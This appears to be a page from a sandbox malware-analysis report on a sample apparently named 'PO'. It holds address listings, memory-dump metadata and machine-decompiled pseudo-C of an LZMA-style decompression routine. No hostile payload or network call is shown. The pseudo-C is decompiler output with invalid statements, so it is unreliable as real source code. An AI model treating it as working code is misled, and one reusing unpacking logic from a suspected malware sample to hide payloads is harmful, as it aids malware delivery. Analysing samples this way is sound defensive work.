0x00406e12
0x00406e15
0x00406e15
0x00406e18
0x00406e1a
0x004070a4
0x00000000
0x004070a4
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2d
0x00406e30
0x00406e30
0x00406e30
0x00000000
0x00406e30
0x00406cae
0x00406cb0
0x00406cb2
0x00406cb4
0x00406cb7
0x00406cb8
0x00406cba
0x00406cbc
0x00406cbf
0x00406cc2
0x00406cd8
0x00406cdd
0x00406d15
0x00406d15
0x00406d19
0x00406d45
0x00406d47
0x00406d4e
0x00406d51
0x00406d54
0x00406d54
0x00406d59
0x00406d59
0x00406d5b
0x00406d5e
0x00406d65
0x00406d68
0x00406d95
0x00406d95
0x00406d98
0x00406d9b
0x00406e0f
0x00406e0f
0x00406e0f
0x00000000
0x00406e0f
0x00406d9d
0x00406da3
0x00406da6
0x00406da9
0x00406dac
0x00406daf
0x00406db2
0x00406db5
0x00406db8
0x00406dbb
0x00406dbe
0x00406dd7
0x00406dd9
0x00406ddc
0x00406ddd
0x00406de0
0x00406de2
0x00406de5
0x00406de7
0x00406de9
0x00406dec
0x00406dee
0x00406df1
0x00406df5
0x00406df7
0x00406df7
0x00406df8
0x00406dfb
0x00406dfe
0x00406dc0
0x00406dc0
0x00406dc8
0x00406dcd
0x00406dcf
0x00406dd2
0x00406dd2
0x00406e01
0x00406e08
0x00406d92
0x00406d92
0x00406d92
0x00406d92
0x00000000
0x00406e0a
0x00000000
0x00406e0a
0x00406e08
0x00406d1b
0x00406d1e
0x00406d20
0x00406d23
0x00406d26
0x00406d29
0x00406d2b
0x00406d2e
0x00406d31
0x00406d31
0x00406d34
0x00406d34
0x00406d37
0x00406d3e
0x00406d12
0x00406d12
0x00406d12
0x00406d12
0x00000000
0x00406d40
0x00000000
0x00406d40
0x00406d3e
0x00406cc4
0x00406cc7
0x00406cc9
0x00406ccc
0x00000000
0x00000000
0x00406a2b
0x00406a2b
0x00406a2f
0x00407074
0x00000000
0x00407074
0x00406a35
0x00406a38
0x00406a3b
0x00406a3e
0x00406a41
0x00406a44
0x00406a47
0x00406a49
0x00406a4c
0x00406a4f
0x00406a52
0x00406a54
0x00406a54
0x00406a54
0x00000000
0x00000000
0x00406bb6
0x00406bb6
0x00406bba
0x00407080
0x00000000
0x00407080
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bcb
0x00406bcb
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd4
0x00406bd7
0x00406bda
0x00406bdd
0x00406bde
0x00406be0
0x00406be0
0x00406be0
0x00406be3
0x00406be6
0x00406be9
0x00406bec
0x00406bec
0x00406bec
0x00406bef
0x00406bf1
0x00406bf1
0x00000000
0x00000000
0x00406e33
0x00406e33
0x00406e33
0x00406e37
0x00000000
0x00000000
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e48
0x00406e48
0x00406e48
0x00406e4b
0x00406e4e
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5b
0x00406e5d
0x00406e5d
0x00406e5d
0x00406e60
0x00406e63
0x00406e66
0x00406e69
0x00406e6c
0x00406e70
0x00406e72
0x00406e75
0x00000000
0x00406e77
0x00406bf4
0x00406bf4
0x00000000
0x00406bf4
0x00406e75
0x004070aa
0x004070cc
0x004070d2
0x004070d4
0x004070db
0x00000000
0x00000000
0x004066d9
0x004070e1
0x004070e1
0x00000000

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a646d1c18714c06b63ca95da94aa03745834858b299022791e2b3ebf89425e7d
Instruction ID: 5389f57cfb4a3ea8b0a271fe5c21418892ef356aef38e154ca47b5156c43700c
Opcode Fuzzy Hash: a646d1c18714c06b63ca95da94aa03745834858b299022791e2b3ebf89425e7d
Instruction Fuzzy Hash: 37816831D04229CBDF24CFA8C844BADBBB0FF44305F11816AD956BB281D7785986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406AE5 Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406AE5() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004070E9))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
